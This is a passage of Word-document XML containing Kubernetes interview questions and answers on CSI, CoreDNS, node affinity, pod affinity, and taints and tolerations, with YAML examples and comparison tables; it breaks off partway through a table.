        <w:t>A: CSI (Container Storage Interface) is a standard interface used in Kubernetes to enable external storage systems to be used as persistent storage for Pods.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core idea</w:t>
        <w:br/>
        <w:t>CSI defines how Kubernetes connects to storage systems (like cloud disks or network storage) in a standardized way.</w:t>
        <w:br/>
        <w:t>It allows Kubernetes to support any storage provider without changing its core code.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why CSI is needed</w:t>
        <w:br/>
        <w:t>Containers are ephemeral:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * When a Pod dies, its data is lost</w:t>
        <w:br/>
        <w:t>So Kubernetes needs:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Persistent storage that survives Pod restarts</w:t>
        <w:br/>
        <w:t>CSI solves this problem.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>What CSI does</w:t>
        <w:br/>
        <w:t>A CSI driver enables Kubernetes to:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Provision storage volumes dynamically</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Attach volumes to nodes</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Mount volumes into Pods</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Detach and delete volumes when no longer needed</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How CSI works (flow)</w:t>
        <w:br/>
        <w:t>When a Pod requests storage:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      1. Pod requests a PersistentVolumeClaim (PVC)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      2. Kubernetes calls the CSI driver</w:t>
        <w:br/>
        <w:t xml:space="preserve">      3. CSI driver:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * creates storage (e.g., disk in cloud)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * attaches it to a node</w:t>
        <w:br/>
        <w:t xml:space="preserve">      4. Volume is mounted into the Pod</w:t>
        <w:br/>
        <w:t xml:space="preserve">      5. Pod can read/write data</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key components of CSI</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * CSI Controller Plugin</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Handles provisioning, attaching, deleting volumes</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * CSI Node Plugin</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Runs on each node</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Mounts/unmounts volumes to Pods</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Examples of CSI drivers</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * AWS EBS CSI driver</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Azure Disk CSI driver</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Google Persistent Disk CSI driver</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Ceph CSI driver</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * NFS CSI driver</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>CSI vs old storage model</w:t>
        <w:br/>
        <w:t>Before CSI:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Storage plugins were built into Kubernetes core (in-tree)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Hard to maintain and extend</w:t>
        <w:br/>
        <w:t>Now:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * CSI is out-of-tree (plugin-based)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Easier to add new storage systems</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key features</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Dynamic volume provisioning</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Volume lifecycle management</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Vendor-neutral storage integration</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Supports block and file storage</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Simple analogy</w:t>
        <w:br/>
        <w:t>Think of Kubernetes like an office:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Pods = employees</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * CSI = storage department that gives employees personal lockers (volumes)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Even if employee leaves, locker data remains</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>CSI vs CNI (important interview comparison)</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>CSI</w:t>
        <w:br/>
        <w:tab/>
        <w:t>CNI</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Full form</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Container Storage Interface</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Container Network Interface</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Purpose</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Storage for Pods</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Networking for Pods</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Handles</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Volumes, disks, filesystems</w:t>
        <w:br/>
        <w:tab/>
        <w:t>IPs, networking routes</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Example</w:t>
        <w:br/>
        <w:tab/>
        <w:t>EBS, NFS, Ceph</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Calico, Flannel</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>CSI is a standardized interface in Kubernetes that allows external storage systems to be integrated as persistent volumes, enabling dynamic provisioning, attachment, and mounting of storage resources to pods in a vendor-neutral way.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q258. What is CoreDNS?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: CoreDNS is the default DNS service used in Kubernetes to provide service discovery and name resolution inside the cluster.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core idea</w:t>
        <w:br/>
        <w:t>CoreDNS allows Pods and Services to communicate using names instead of IP addresses.</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Instead of 10.96.0.10</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * You use: my-service.default.svc.cluster.local</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why CoreDNS is needed</w:t>
        <w:br/>
        <w:t>In Kubernetes:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Pod IPs change frequently</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Services need stable communication names</w:t>
        <w:br/>
        <w:t>CoreDNS solves this by mapping:</w:t>
        <w:br/>
        <w:t>Service name → Cluster IP → Pod endpoints</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>What CoreDNS does</w:t>
        <w:br/>
        <w:t>1. Service name resolution</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Resolves Kubernetes Service names to Cluster IPs</w:t>
        <w:br/>
        <w:t>2. Pod discovery inside cluster</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Helps pods find other services using DNS</w:t>
        <w:br/>
        <w:t>3. Cluster domain management</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Default domain: cluster.local</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example DNS format in Kubernetes</w:t>
        <w:br/>
        <w:t>&lt;service&gt;.&lt;namespace&gt;.svc.cluster.local</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>nginx.default.svc.cluster.local</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How CoreDNS works (flow)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      1. Pod sends DNS request (e.g., my-service)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      2. Request goes to CoreDNS service in cluster</w:t>
        <w:br/>
        <w:t xml:space="preserve">      3. CoreDNS checks Kubernetes API</w:t>
        <w:br/>
        <w:t xml:space="preserve">      4. Finds service → gets Cluster IP</w:t>
        <w:br/>
        <w:t xml:space="preserve">      5. Returns IP to the pod</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key features</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Pluggable DNS server</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Highly configurable via Corefile</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Supports caching for performance</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Integrates with Kubernetes API dynamically</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Where it runs</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Runs as a Deployment inside the cluster</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Exposed as a ClusterIP service</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Typically runs multiple replicas for high availability</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>CoreDNS plugins (important concept)</w:t>
        <w:br/>
        <w:t>CoreDNS uses plugins such as:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * kubernetes → resolves cluster services</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * forward → forwards external DNS queries</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * cache → speeds up responses</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * health → monitors DNS health</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>CoreDNS vs kube-proxy (common confusion)</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>CoreDNS</w:t>
        <w:br/>
        <w:tab/>
        <w:t>kube-proxy</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Purpose</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Name resolution</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Traffic routing</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Works on</w:t>
        <w:br/>
        <w:tab/>
        <w:t>DNS queries</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Network packets</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Output</w:t>
        <w:br/>
        <w:tab/>
        <w:t>IP address</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Pod routing</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Simple analogy</w:t>
        <w:br/>
        <w:t>Think of Kubernetes as a company:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Pods = employees</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Services = departments</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * CoreDNS = company phonebook</w:t>
        <w:br/>
        <w:t>Instead of remembering numbers, you just call:</w:t>
        <w:br/>
        <w:t>“finance.service.company.local”</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>CoreDNS is the default DNS server in Kubernetes that provides service discovery by resolving service names to cluster IPs, enabling pods to communicate with each other using human-readable DNS names instead of IP addresses.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q259. Explain node affinity.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Node affinity is a scheduling feature in Kubernetes that lets you control which nodes a Pod can or should run on based on node labels.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core idea</w:t>
        <w:br/>
        <w:t>Node affinity tells the scheduler: “Place this Pod on nodes that match these rules.”</w:t>
        <w:br/>
        <w:t>It is a more expressive and flexible replacement for nodeSelector.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why node affinity is used</w:t>
        <w:br/>
        <w:t>It helps you:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Run workloads on specific hardware (GPU, SSD, high-memory nodes)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Separate environments (dev, staging, prod)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Control placement across zones/regions</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Optimize performance and cost</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How it works</w:t>
        <w:br/>
        <w:t>Nodes have labels like:</w:t>
        <w:br/>
        <w:t>disktype: ssd</w:t>
        <w:br/>
        <w:t>zone: us-east-1a</w:t>
        <w:br/>
        <w:t>gpu: true</w:t>
        <w:br/>
        <w:t>Pod defines affinity rules to match these labels.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Types of node affinity</w:t>
        <w:br/>
        <w:t>1. Required (Hard rule)</w:t>
        <w:br/>
        <w:t>Pod MUST run only on matching nodes</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Strict constraint</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * If no node matches → Pod stays Pending</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>nodeAffinity:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  requiredDuringSchedulingIgnoredDuringExecution:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    nodeSelectorTerms:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    - matchExpressions:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      - key: disktype</w:t>
        <w:br/>
        <w:t xml:space="preserve">        operator: In</w:t>
        <w:br/>
        <w:t xml:space="preserve">        values:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        - ssd</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. Preferred (Soft rule)</w:t>
        <w:br/>
        <w:t>Scheduler tries best to match, but not mandatory</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Used for optimization, not restriction</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Pod still runs if no preferred node exists</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>nodeAffinity:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  preferredDuringSchedulingIgnoredDuringExecution:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - weight: 1</w:t>
        <w:br/>
        <w:t xml:space="preserve">    preference:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      matchExpressions:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      - key: zone</w:t>
        <w:br/>
        <w:t xml:space="preserve">        operator: In</w:t>
        <w:br/>
        <w:t xml:space="preserve">        values:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        - us-east-1a</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Operators used</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * In</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * NotIn</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Exists</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * DoesNotExist</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Gt, Lt</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Node affinity vs nodeSelector</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>nodeSelector</w:t>
        <w:br/>
        <w:tab/>
        <w:t>node affinity</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Flexibility</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Low</w:t>
        <w:br/>
        <w:tab/>
        <w:t>High</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Logic</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Exact match</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Complex expressions</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Required/Preferred</w:t>
        <w:br/>
        <w:tab/>
        <w:t>No</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Yes</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Use case</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Simple scheduling</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Advanced scheduling</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Types of affinity scope</w:t>
        <w:br/>
        <w:t>1. During scheduling</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Controls initial placement</w:t>
        <w:br/>
        <w:t>2. During execution</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * IgnoredDuringExecution means:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * If node labels change after scheduling, Pod is NOT evicted</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Simple analogy</w:t>
        <w:br/>
        <w:t>Think of it like job placement:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Node labels = company locations &amp; facilities</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Pod = employee</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Node affinity = “I want to work in a city with a data center and SSD storage”</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>Node affinity in Kubernetes is a scheduling mechanism that allows pods to be assigned to nodes based on node labels using flexible rules, supporting both required (hard constraints) and preferred (soft preferences) conditions for pod placement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q260. What is pod affinity?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Pod affinity in Kubernetes is a scheduling rule that tells the system to place a Pod close to other Pods that match certain labels.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core idea</w:t>
        <w:br/>
        <w:t>Pod affinity controls “which pods should run together” on the same node or in the same topology (like a zone or rack).</w:t>
        <w:br/>
        <w:t>It is the opposite of spreading randomly across nodes—it helps group related workloads together.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why pod affinity is used</w:t>
        <w:br/>
        <w:t>You use it when:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Two services communicate frequently (reduce latency)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Microservices need to be co-located</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Caching layers should stay close to application pods</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * You want better network performance between pods</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How it works</w:t>
        <w:br/>
        <w:t>Kubernetes scheduler checks:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Labels on existing Pods</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Your affinity rules</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Available nodes and topology constraints</w:t>
        <w:br/>
        <w:t>Then it tries to place the new Pod near matching Pods.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example scenario</w:t>
        <w:br/>
        <w:t>If you have:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Backend pods labeled: app=backend</w:t>
        <w:br/>
        <w:t>And you want frontend pods to run close to them:</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Pod affinity rule example</w:t>
        <w:br/>
        <w:t>affinity:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  podAffinity:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    requiredDuringSchedulingIgnoredDuringExecution:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    - labelSelector:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        matchExpressions:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        - key: app</w:t>
        <w:br/>
        <w:t xml:space="preserve">          operator: In</w:t>
        <w:br/>
        <w:t xml:space="preserve">          values:</w:t>
        <w:br/>
        <w:t xml:space="preserve">          - backend</w:t>
        <w:br/>
        <w:t xml:space="preserve">      topologyKey: "kubernetes.io/hostname"</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>What this means</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Find pods with label app=backend</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Schedule this pod on the same node (hostname level)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Types of pod affinity</w:t>
        <w:br/>
        <w:t>1. Required (hard rule)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Pod MUST be scheduled near matching pods</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * If not possible → Pod stays Pending</w:t>
        <w:br/>
        <w:t>2. Preferred (soft rule)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Scheduler tries to colocate pods</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * If not possible → still schedules elsewhere</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>topologyKey (important concept)</w:t>
        <w:br/>
        <w:t>Defines how “close” is defined:</w:t>
        <w:br/>
        <w:t>Value</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Meaning</w:t>
        <w:br/>
        <w:tab/>
        <w:t>kubernetes.io/hostname</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Same node</w:t>
        <w:br/>
        <w:tab/>
        <w:t>topology.kubernetes.io/zone</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Same availability zone</w:t>
        <w:br/>
        <w:tab/>
        <w:t>topology.kubernetes.io/region</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Same region</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Pod affinity vs node affinity</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Pod Affinity</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Node Affinity</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Focus</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Pod-to-pod placement</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Pod-to-node placement</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Based on</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Pod labels</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Node labels</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Goal</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Co-locate workloads</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Choose correct node</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Simple analogy</w:t>
        <w:br/>
        <w:t>Think of an office:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Pods = employees</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Pod affinity = “Put team members in the same room/building for collaboration”</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>Pod affinity in Kubernetes is a scheduling feature that allows pods to be placed close to other pods based on label selectors and topology rules, enabling workload co-location to improve performance and communication efficiency.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q261. Explain taints and tolerations.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Taints and tolerations in Kubernetes are mechanisms used to control which Pods are allowed to run on which Nodes.</w:t>
        <w:br/>
        <w:t>They work together to implement node-level restrictions and exceptions.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core idea</w:t>
        <w:br/>
        <w:t>Taints are applied on nodes (to repel pods)</w:t>
        <w:br/>
        <w:t>Tolerations are applied on pods (to allow them in)</w:t>
        <w:br/>
        <w:t>So:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Taint = “Stay away from me” (node says this)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Toleration = “I can tolerate this condition” (pod says this)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>1. Taints</w:t>
        <w:br/>
        <w:t>A taint is applied to a node to prevent unwanted pods from scheduling there.</w:t>
        <w:br/>
        <w:t>Format:</w:t>
        <w:br/>
        <w:t>key=value:effect</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Effects of taints</w:t>
        <w:br/>
        <w:t>1. NoSchedule</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Pods without toleration will NOT be scheduled</w:t>
        <w:br/>
        <w:t>2. PreferNoSchedule</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Kubernetes tries to avoid placing pods, but not strict</w:t>
        <w:br/>
        <w:t>3. NoExecute</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Existing pods are also evicted immediately</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example taint</w:t>
        <w:br/>
        <w:t>kubectl taint nodes node1 key=dedicated:NoSchedule</w:t>
        <w:br/>
        <w:t>This means:</w:t>
        <w:br/>
        <w:t>“Do not schedule normal pods on this node”</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. Tolerations</w:t>
        <w:br/>
        <w:t>A toleration is defined in a Pod to allow it to be scheduled onto a tainted node.</w:t>
        <w:br/>
        <w:t>It does NOT force scheduling—only allows it.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example toleration</w:t>
        <w:br/>
        <w:t>tolerations:</w:t>
        <w:br/>
        <w:t>- key: "dedicated"</w:t>
        <w:br/>
        <w:t xml:space="preserve">  operator: "Equal"</w:t>
        <w:br/>
        <w:t xml:space="preserve">  value: "dev"</w:t>
        <w:br/>
        <w:t xml:space="preserve">  effect: "NoSchedule"</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Meaning</w:t>
        <w:br/>
        <w:t>“This pod is allowed to run on nodes tainted with dedicated=dev:NoSchedule”</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How they work together</w:t>
        <w:br/>
        <w:t>Node (Taint)</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Pod (Toleration)</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Result</w:t>
        <w:br/>
        <w:tab/>
        <w:t>No taint</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Any pod</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Allowed</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Taint exists</w:t>
        <w:br/>
        <w:tab/>
